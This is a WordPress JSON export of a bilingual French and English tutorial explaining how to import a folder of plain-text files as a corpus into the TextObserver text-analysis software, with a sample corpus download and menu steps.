{"id":82,"date":"2014-02-26T16:21:39","date_gmt":"2014-02-26T15:21:39","guid":{"rendered":"http:\/\/textopol2.u-pec.fr\/textobserver\/?p=82"},"modified":"2018-09-18T16:20:34","modified_gmt":"2018-09-18T15:20:34","slug":"importer-un-corpus-au-format-txt","status":"publish","type":"post","link":"http:\/\/textopol.u-pec.fr\/textobserver\/?p=82","title":{"rendered":"Importer un corpus au format TXT"},"content":{"rendered":"<p><!--:fr-->Dans cette configuration, il s&rsquo;agit de traiter un dossier contenant plusieurs fichiers texte.<\/p>\n<p>Dans ce cas il n&rsquo;est pas n\u00e9cessaire d&rsquo;introduire de balisage, la partition sera cr\u00e9\u00e9e en fonction du nom des fichiers.<\/p>\n<p>Proc\u00e9dure: placer dans un dossier les diff\u00e9rentes parties du corpus au format texte brut. (Un fichier par partie).<\/p>\n<p>Exemple du corpus textes_genres<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/wp-content\/uploads\/2013\/11\/textes_genre.zip\" target=\"_blank\">&gt;&gt; T\u00e9l\u00e9charger ce corpus<\/a><\/p>\n<p>D\u00e9compresser l&rsquo;archive et copier le dossier textes_genres dans le r\u00e9pertoire de TextObserver<\/p>\n<p>Le dossier textes_ genres contient 5 fichiers txt<\/p>\n<p>Lancer TextObserver (voir proc\u00e9dure)<\/p>\n<p>Importer le corpus au moyen de la proc\u00e9dure suivante :<\/p>\n<p>Menu Fichier &gt; Importer&gt; R\u00e9pertoire de corpus&gt; Format TXT&#8230;<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte.jpg\"><img loading=\"lazy\" alt=\"importer-fichiers-texte\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte.jpg\" width=\"452\" height=\"130\" \/><\/a><\/p>\n<p>Choisir le dossier contenant les fichiers texte<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-160\" 
alt=\"importer-fichiers-texte2\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2.jpg\" width=\"610\" height=\"436\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2.jpg 610w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/importer-fichiers-texte2-300x214.jpg 300w\" sizes=\"(max-width: 610px) 100vw, 610px\" \/><\/a><\/p>\n<p>Cliquer sur \u00ab\u00a0Ouvrir\u00a0\u00bb apr\u00e8s avoir choisi le bon encodage<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-164\" alt=\"choix_partition\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition.jpg\" width=\"554\" height=\"410\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition.jpg 554w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/choix_partition-300x222.jpg 300w\" sizes=\"(max-width: 554px) 100vw, 554px\" \/><\/a><\/p>\n<p>Choisir les propri\u00e9t\u00e9s lorsque le panneau ci-dessus appara\u00eet.<\/p>\n<p>Cliquer sur \u00ab\u00a0Cr\u00e9er les tables lexicales\u00a0\u00bb.<\/p>\n<p>A l&rsquo;issue de la proc\u00e9dure le message suivant s&rsquo;affiche.<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-166\" alt=\"creation_table\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table.jpg\" width=\"909\" height=\"186\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table.jpg 909w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table-300x61.jpg 300w, 
http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/creation_table-624x127.jpg 624w\" sizes=\"(max-width: 909px) 100vw, 909px\" \/><\/a><\/p>\n<p>Apr\u00e8s validation, ouvrir la table ainsi cr\u00e9\u00e9e.\u00a0 (Fichier &gt; Ouvrir &gt; Table(s) Lexicale(s)&#8230;)<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-168\" alt=\"menu-ouvrir-table-lex\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex.jpg\" width=\"304\" height=\"116\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex.jpg 304w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/02\/menu-ouvrir-table-lex-300x114.jpg 300w\" sizes=\"(max-width: 304px) 100vw, 304px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-170\" alt=\"ouverture_table\" src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table.jpg\" width=\"697\" height=\"549\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table.jpg 697w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table-300x236.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/ouverture_table-624x491.jpg 624w\" sizes=\"(max-width: 697px) 100vw, 697px\" \/><\/a><\/p>\n<p>Le corpus est pr\u00eat, l&rsquo;exploration peut commencer&#8230;<\/p>\n<p><a href=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat.jpg\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-172\" alt=\"resultat\" 
src=\"http:\/\/textopol2.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-1024x756.jpg\" width=\"625\" height=\"461\" srcset=\"http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-1024x756.jpg 1024w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-300x221.jpg 300w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat-624x461.jpg 624w, http:\/\/textopol.u-pec.fr\/textobserver\/wp-content\/uploads\/2014\/05\/resultat.jpg 1372w\" sizes=\"(max-width: 625px) 100vw, 625px\" \/><\/a><!--:--><!--:en-->You can load several text files at once by importing a directory.<\/p>\n<p>You don&rsquo;t need to tag the corpus. The partition is created from the file names (one text file per part).<\/p>\n<p>To do so, place all the plain-text files that make up your corpus in a single directory (one file per part).<\/p>\n<p>Example: the textes_genres corpus<\/p>\n<p>Download: http:\/\/textopol2.u-pec.fr\/wp-content\/uploads\/2013\/11\/textes_genre.zip<\/p>\n<p>Unzip the archive and copy the textes_genres directory into the root directory of TextObserver<\/p>\n<p>There are 5 text files in the textes_genres directory<\/p>\n<p>\u00a0<br \/>\n\u00a0<!--:--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dans cette configuration, il s&rsquo;agit de traiter un dossier contenant plusieurs fichiers texte. Dans ce cas il n&rsquo;est pas n\u00e9cessaire d&rsquo;introduire de balisage, la partition sera cr\u00e9\u00e9e en fonction du nom des fichiers. Proc\u00e9dure: placer dans un dossier les diff\u00e9rentes parties du corpus au format texte brut. (Un fichier par partie). 
Exemple du corpus textes_genres [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2],"tags":[],"_links":{"self":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/82"}],"collection":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=82"}],"version-history":[{"count":14,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/82\/revisions"}],"predecessor-version":[{"id":381,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=\/wp\/v2\/posts\/82\/revisions\/381"}],"wp:attachment":[{"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/textopol.u-pec.fr\/textobserver\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}